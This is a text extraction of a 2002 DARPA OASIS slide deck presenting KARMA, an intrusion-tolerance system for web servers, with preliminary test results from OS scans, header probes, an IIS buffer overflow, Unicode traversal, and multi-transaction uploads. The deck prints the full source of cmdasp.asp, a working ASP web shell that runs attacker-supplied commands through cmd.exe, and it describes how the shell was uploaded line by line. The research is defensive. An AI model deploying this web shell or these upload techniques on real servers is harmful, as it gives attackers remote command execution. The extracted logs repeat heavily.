darpa oasis pi meeting – hilton head – march 12-15, 2002slide 1 aegis research corporation karma...

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002 Slide 1

Aegis Research Corporation

KARMAKinetic Application of Redundancy to Mitigate Attacks

(Intrusion Tolerance Using Masking, Redundancy and Dispersion)

DARPA OASIS PI Meeting – Hilton Head – March 12-15, 2002

Janet Lepanto

William Weinstein

The Charles Stark Draper Laboratory, Inc.

Aegis Research Corporation®




Overview

• Objectives and Assumptions

• Preliminary Test Results

• Validation Test Strategy



Objectives and Assumptions

• Objectives

– Employ only a small set of trusted components to protect a large set of untrusted unmodified COTS servers and databases

– Minimize loss of data confidentiality and integrity in the presence of a successful attack on one of the servers

– Tolerate attacks whose specific signatures are not known a priori

• Assumptions

– Attacker desires stealth so transaction rates will be relatively low

– Attacks employing high transaction rates and recognizable signatures will be addressed by front-end firewalls and/or other intrusion detection mechanisms

– Exploitation of latent vulnerabilities will require more than a single transaction



ArchitectureE

xter

nal

WA

N

ExternalFirewall

DataBase

TransactionMediator

Gateway

Sw

itch

ed I

P

Server(1)

Server(N)

Server(2)

Configuration Manager

Sw

itch

ed I

P

COTS

Trusted

Other



Mechanisms

• Gateway

– Mask identities of origin server operating systems and web server applications

– Distribute client transactions among the origin servers such that the client cannot predict which server will handle a transaction

• Configuration Manager

– Monitor status of origin servers (via agent on each server) for anomalies

– Reconfigure server to “clean” state if anomalies are detected

• Transaction Mediator

– Log transactions to back-end database to support rollback recovery



KARMA Preliminary Testing

• Discovery– OS identification

– Web server enumeration

– Probing with malformed request

• Web Server Exploitation– Buffer overflow exploit to get shell command

– Unicode exploit

– Multi-transaction Unicode attack to plant executable

– Smart multi-transaction attack with server agents active



OS identification attempts to guess the operating system and version of a remote system

Freely available programs used for OS identification include xprobe (icmp based), queso, and nmap

By identifying the specific operating system of a target platform, a hacker can focus the attack, minimizing time and attack signatures

KARMA masks OS identity of the Gateway

Discovery(OS Identification)

Gateway


Server(2)

Server(1)

Server(N)



Unable to determine OS of remote system

Time required for this activity is relatively long

OS identification run against KARMA public IP address

Discovery (OS Identification)

Starting nmap V. 2.53 by [email protected] ( www.insecure.org/nmap/ )

Interesting ports on (192.80.95.40):

Port State Service

80/tcp open http

TCP Sequence Prediction: Class=random positive increments

Difficulty=38245 (Worthy challenge)

No OS matches for host (If you know what OS is running on it, see http://www.insecure.org/cgi-bin/nmap-submit.cgi).

Nmap run completed – 1 IP address (1 hosts up) scanned in 24 seconds

[root@aegis With-KARMA]# nmap -sT -n -r –p 80 -P0 -O its.c4i.draper.com

Starting nmap V. 2.53 by [email protected] ( www.insecure.org/nmap/ )

Interesting ports on (192.80.95.40):

Port State Service

80/tcp open http

TCP Sequence Prediction: Class=random positive increments

Difficulty=38245 (Worthy challenge)

No OS matches for host (If you know what OS is running on it, see http://www.insecure.org/cgi-bin/nmap-submit.cgi).



Web server enumeration attempts to remotely determine the currently running version of web server software

In response to a HEAD command, web servers typically reveal the version of the software in the “Server” field of the HTTP response

Successful enumeration allows a hacker to focus the attack against the specific web server software

KARMA scrubs web server responses to mask the identity of the responding web serverRemoves specific identifying information

(e.g., “Server” header)

Removes server unique information such as E-tags

Reformats error responses to mask serverunique implementations

Discovery (Web Server Enumeration)

Gateway


Server(2)

Server(1)

Server(N)



Issue the HEAD command to the server

“Server” field identifies the server as Microsoft-IIS/4.0

Probe web server directly


[root@mystic Without-KARMA]# nc 192.168.0.14 80

HTTP/1.1 200 OK

Server: Microsoft-IIS/4.0

Content-Location: http://192.168.0.14/Default.htm

Date: Fri, 04 Jan 2002 19:41:23 GMT

Content-Type: text/html

Accept-Ranges: bytes

Last-Modified: Wed, 02 Jan 2002 21:36:45 GMT

ETag: "804e5a95c5ec11:b84"

Content-Length: 6783


HEAD / HTTP/1.0



Issue the HEAD command to the server

“Server” field no longer present in the HTTP response

Probe web server via KARMA


[root@aegis With-KARMA]# nc its.c4i.draper.com 80

HTTP/1.1 200 OK

Connection: close

Date: Fri, 04 Jan 2002 22:40:28 GMT

Accept-Ranges: bytes

Content-Length: 6913


Last-Modified: Wed, 02 Jan 2002 21:36:45 GMT

HEAD / HTTP/1.0



System often discloses information when responding to erroneous conditions

Attackers can trigger such disclosure and use the information to create a blueprint of the target network

Upon receiving a malformed request to an existing directory the web server responds with an error message that contains its internal IP address

KARMA sanitizes error responses from the web servers and and then forwards them to the user

Discovery (Probing with a Malformed Request)

Gateway


Server(2)

Server(1)

Server(N)



The web server returns a “302 Object Moved” error

Error message contains the internal IP address

Issue “GET /html” directly to an origin server


HTTP/1.1 302 Object Moved

Location: http://192.168.0.14/html/



Content-Length: 141

<head><title>Document Moved</title></head>

<body><h1>Object Moved</h1>This document may be found

<a HREF="http://192.168.0.14/html/">here</a></body>

[root@mystic Without-KARMA]# nc 192.168.0.14 80

GET /html HTTP/1.0

HTTP/1.1 302 Object Moved

Location: http://192.168.0.14/html/



Content-Length: 141

<head><title>Document Moved</title></head>

<body><h1>Object Moved</h1>This document may be found

<a HREF="http://192.168.0.14/html/">here</a></body>



Web server returns a “301 Moved Permanently” error

Error message does not contain internal IP address

Issue “GET /html” via KARMA


HTTP/1.1 301 Moved Permanently

Connection: close

Location: http://its.c4i.draper.com/html/

Content-Length: 254

<HTML><HEAD><TITLE>301 - Moved Permanently</TITLE></HEAD>

<BODY><FONT SIZE=6><B>301 - Moved Permanently</B></FONT><BR><BR><FONT SIZE=4>

<a href=" http://its.c4i.draper.com/html/"> http://its.c4i.draper.com/html/</a></FONT>

</BODY></HTML>

[root@aegis With-KARMA]# nc its.c4i.draper.com 80

GET /html HTTP/1.0

HTTP/1.1 301 Moved Permanently

Connection: close

Location: http://its.c4i.draper.com/html/

Content-Length: 254

<HTML><HEAD><TITLE>301 - Moved Permanently</TITLE></HEAD>

<BODY><FONT SIZE=6><B>301 - Moved Permanently</B></FONT><BR><BR><FONT SIZE=4>

<a href=" http://its.c4i.draper.com/html/"> http://its.c4i.draper.com/html/</a></FONT>

</BODY></HTML>



Windows 2000 Internet printing ISAPI extension is vulnerable to a buffer overflow exploit

Exploit causes buffer overflow on the IIS web server which returns a command shell to attacker on TCP port 81

This command shell has administrator level access, enabling the attacker to modify all data on the machine and launch additional attacks from the compromised server

Web Server Exploitation(Buffer Overflow)

Gateway


Server(2)

Server(1)

Server(N)



Command shell returned from server “ver” command returns the version of windows

Execute directly against server and listen for shell on port 81


“ipconfig /all” reports the server’s network configuration



Unsuccessful, command shell is never returned

Attack is thwarted

Execute via KARMA and listen for shell on port 81




Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot “../” directory traversal exploitation if extended Unicode character representations are used in substitution for “/” and “\” (such as %c0 and %af)

This vulnerability enables unauthenticated to access any known file or program on the web server

Successful exploitation would yield the same privileges as a user who could remotely log onto the system with no credentials

Web Server Exploitation(Unicode Exploit)

Gateway


Server(2)

Server(1)

Server(N)



“dir c:\” reveals the contents of the root directory “ver” command returns the version of windows

Execute Unicode attack directly against server




“dir c:\” sent to server several times before success “ver” returns error message for every request

Execute Unicode attack via KARMA




A multi-transaction Unicode attack requires a sequence of successful Unicode requests (transactions). For example, uploading a file line by line using the windows “echo” command

Attacker uploads for exploit the web server.cmdasp.asp (exploit allows the attacker to execute commands with system

level privileges)

upload.asp (script allows an attacker to upload files via HTTP)

KARMA dispersion makes multi-transaction attacks more difficult Increases the time required to exploit the web server

Increases the attack signature and probability of detection

Web Server Exploitation(Multi-Transaction)

Gateway


Server(2)

Server(1)

Server(N)




unicodeloader.pl uploads the file cmdasp.asp line by line utilizing the “echo” command in multiple Unicode strings

cmdasp.asp – web script to exploit local windows vulnerability that enables the attacker to execute commands with system level privileges

Attacker accesses cmdasp.asp with a web browser and enters commands




Attack web server directly




Attack web servers via KARMA



“cmdasp.asp” with KARMA3 - Dim oScriptNet 10 - Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 13 - szTempFile = "C:\" & oFileSys.GetTempName( ) 17 - %> 20 - <FORM action="<%= Request.ServerVariables("URL") %>" method="POST"> 23 - </FORM> 25 - <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %> 28 - If (IsObject(oFile)) Then 32 - Call oFileSys.DeleteFile(szTempFile, True) 36 - </HTML>

“cmdasp.asp” without KARMA1 - <%@ Language=VBScript %>2 - <%3 - Dim oScript4 - Dim oScriptNet5 - Dim oFileSys, oFile6 - Dim szCMD, szTempFile7 - On Error Resume Next8 - Set oScript = Server.CreateObject("WSCRIPT.SHELL")9 - Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")10 - Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")11 - szCMD = Request.Form(".CMD")12 - If (szCMD <> "") Then13 - szTempFile = "C:\" & oFileSys.GetTempName( )14 - Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)15 - Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)16 - End If17 - %>18 - <HTML>19 - <BODY>20 - <FORM action="<%= Request.ServerVariables("URL") %>" method="POST">21 - <input type=text name=".CMD" size=45 value="<%= szCMD %>">22 - <input type=submit value="Run">23 - </FORM>24 - <PRE>25 - <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>26 - <br>27 - <%28 - If (IsObject(oFile)) Then29 - On Error Resume Next30 - Response.Write Server.HTMLEncode(oFile.ReadAll)31 - oFile.Close32 - Call oFileSys.DeleteFile(szTempFile, True)33 - End If34 - %>35 - </BODY> 36 - </HTML>


“cmdasp.asp” without KARMA1 - <%@ Language=VBScript %>2 - <%3 - Dim oScript4 - Dim oScriptNet5 - Dim oFileSys, oFile6 - Dim szCMD, szTempFile7 - On Error Resume Next8 - Set oScript = Server.CreateObject("WSCRIPT.SHELL")9 - Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")10 - Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")11 - szCMD = Request.Form(".CMD")12 - If (szCMD <> "") Then13 - szTempFile = "C:\" & oFileSys.GetTempName( )14 - Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)15 - Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)16 - End If17 - %>18 - <HTML>19 - <BODY>20 - <FORM action="<%= Request.ServerVariables("URL") %>" method="POST">21 - <input type=text name=".CMD" size=45 value="<%= szCMD %>">22 - <input type=submit value="Run">23 - </FORM>24 - <PRE>25 - <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>26 - <br>27 - <%28 - If (IsObject(oFile)) Then29 - On Error Resume Next30 - Response.Write Server.HTMLEncode(oFile.ReadAll)31 - oFile.Close32 - Call oFileSys.DeleteFile(szTempFile, True)33 - End If34 - %>35 - </BODY> 36 - </HTML>

“cmdasp.asp” with KARMA3 - Dim oScriptNet 10 - Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 13 - szTempFile = "C:\" & oFileSys.GetTempName( ) 17 - %> 20 - <FORM action="<%= Request.ServerVariables("URL") %>" method="POST"> 23 - </FORM> 25 - <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %> 28 - If (IsObject(oFile)) Then 32 - Call oFileSys.DeleteFile(szTempFile, True) 36 - </HTML>



An attacker with detailed knowledge of the KARMA environment can initiate an advanced multi-transaction Unicode attack with error checking.

Upload a line of the script and then recursively checks for success Create unique directory and “echo” first line of script Check unique directory for file size to verify successful upload If successful “echo” line two and continue process else retry first line

Server Agent detects changes to origin server configuration Server stopped and taken out of service by Configuration Manager Rebuilt from trusted archive Returned to service

Web Server Exploitation(KARMA Server Agents Active)

Gateway


Server(2)

Server(1)

Server(N)



Web Server Exploitation(KARMA Server Agents Active)

exploiting directory: C:\Inetpub\scripts\adv-uniloader

uploading ASP section:

sending line 1 of 36

Checking directory for upload..

Line uploaded SUCCESSFULL. cmdasp.asp is now 4482 bytes.

Advanced Unicode upload utility with error checking

[root@aegis With-KARMA]# adv-uniloader.pl 192.80.95.40:80 cmdasp.asp

First line successfully uploaded to server on first attempt

Second line fails several times due to dispersion mechanism

Agent identifies attack and shuts down server








Upload NOT successfull cmdasp.asp is still 4482 bytes





























Web Server Exploitation(KARMA Server Agent Log)

Server 4 Agent log file

No anomalies detected by the Server Agent on server 4

Attack detected, stop server, refresh content to original data, and restart web service

Attack remediated, server 4 back to normal operation

in tier 3: tier completion reporting, verbosity 1, failures 0




connection to CM closed: fd=164

The World Wide Web Publishing Service service is stopping.got cleanup_restart command

The World Wide Web Publishing Service service was stopped successfully.

The IIS Admin Service service is stopping...

The IIS Admin Service service was stopped successfully.

The Content Index service is stopping.

The Content Index service was stopped successfully.

The Content Index service is starting.

The Content Index service was started successfully.

The World Wide Web Publishing Service service is starting...

The World Wide Web Publishing Service service was started successfully.

in osa: need to refresh tier 1







































































1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0

1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0

1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0

1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0

1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0

1015623460:455132 192.168.0.14:5104 1 0 1015623614:276 3 0

1015623460:768275 192.168.0.12:5104 1 0 1015623614:276 2 0

1015623460:768291 192.168.0.12:5104 1 0 1015623614:276 3 0

1015623467:535619 192.168.0.14:5104 1 3 1015623614:276 2 2 c:\Inetpub\scripts\advuni\cmdasp.asp 2 field 4: filesize different: ref=4482 gath=4487 field 6: mtime different: ref=1013802544:0 gath=1015623975:0

1015623467:535636 192.168.0.14:5104 1 0 1015623614:276 2 1

1015623467:847902 192.168.0.12:5104 1 0 1015623614:276 2 0

1015623468:448854 192.168.0.11:5104 1 0 1015623543:385173 2 0


1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0

1015623458:745560 192.168.0.12:5104 1 0 1015623614:276 2 0

1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0

1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0

1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0

1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0

Web Server Exploitation(KARMA Configuration Manager Log)

Configuration Manager log file

Server agents reporting OK

Problem identified by server 4, unauthorized file c:\inetpub\scripts\advuni\cmdasp.asp detected

Server 4 back to normal operation, servers reporting OK

1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0

1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0

1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0

1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0

1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0

1015623460:455132 192.168.0.14:5104 1 0 1015623614:276 3 0

1015623460:768275 192.168.0.12:5104 1 0 1015623614:276 2 0

1015623460:768291 192.168.0.12:5104 1 0 1015623614:276 3 0


1015623467:535636 192.168.0.14:5104 1 0 1015623614:276 2 1

1015623467:847902 192.168.0.12:5104 1 0 1015623614:276 2 0

1015623468:448854 192.168.0.11:5104 1 0 1015623543:385173 2 0


1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0

1015623458:745560 192.168.0.12:5104 1 0 1015623614:276 2 0

1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0

1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0

1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0

1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0

1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0

1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0

1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0

1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0

1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0

1015623460:455132 192.168.0.14:5104 1 0 1015623614:276 3 0

1015623460:768275 192.168.0.12:5104 1 0 1015623614:276 2 0

1015623460:768291 192.168.0.12:5104 1 0 1015623614:276 3 0


1015623467:535636 192.168.0.14:5104 1 0 1015623614:276 2 1

1015623467:847902 192.168.0.12:5104 1 0 1015623614:276 2 0

1015623468:448854 192.168.0.11:5104 1 0 1015623543:385173 2 0


1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0

1015623458:745560 192.168.0.12:5104 1 0 1015623614:276 2 0

1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0

1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0

1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0

1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0

1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0

1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0

1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0

1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0

1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0

1015623460:455132 192.168.0.14:5104 1 0 1015623614:276 3 0

1015623460:768275 192.168.0.12:5104 1 0 1015623614:276 2 0

1015623460:768291 192.168.0.12:5104 1 0 1015623614:276 3 0


1015623467:535636 192.168.0.14:5104 1 0 1015623614:276 2 1

1015623467:847902 192.168.0.12:5104 1 0 1015623614:276 2 0

1015623468:448854 192.168.0.11:5104 1 0 1015623543:385173 2 0


1015623458:432247 192.168.0.14:5104 1 0 1015623614:276 2 0

1015623458:745560 192.168.0.12:5104 1 0 1015623614:276 2 0

1015623459:269210 192.168.0.11:5104 1 0 1015623534:295150 2 0

1015623459:756894 192.168.0.12:5104 1 0 1015623614:276 2 0

1015623460:289141 192.168.0.11:5104 1 0 1015623535:305162 2 0

1015623460:455114 192.168.0.14:5104 1 0 1015623614:276 2 0



Summary of Preliminary Test Results

• Discovery– Scanning tools could not determine OS of Gateway

• Origin servers not directly exposed to OS scans

– Probing to create web servers error responses failed to uncover web server type• Web Server Exploitation

– Buffer overflow of printing extension failed to return command shell– Execution of single string Unicode exploits slowed by dispersion mechanism

• KARMA architecture rendered some “pseudo shell commands” ineffective• Exploit was able to return directory information

– Multi-transaction file buildup thwarted by dispersion mechanism– Smart multi-transaction file buildup stopped by server agent



Validation Test Strategy

• Controlled Vulnerability Testing• Configure origin servers with known weaknesses

• Compare effect of attacks directly on server with same attack via KARMA

• Blind Red Team Testing• Configure origin servers with latest security patches

• Give the Red team no information at all about the system

• Objective is to compromise the data base

• Targeted Red Team Testing• Configure origin servers with latest security patches

• Inform the red team about the general architecture and operating strategy, but provide no details

• Objective is to compromise the data base

darpa oasis pi meeting – hilton head – march 12-15, 2002slide 1 aegis research corporation karma...

Documents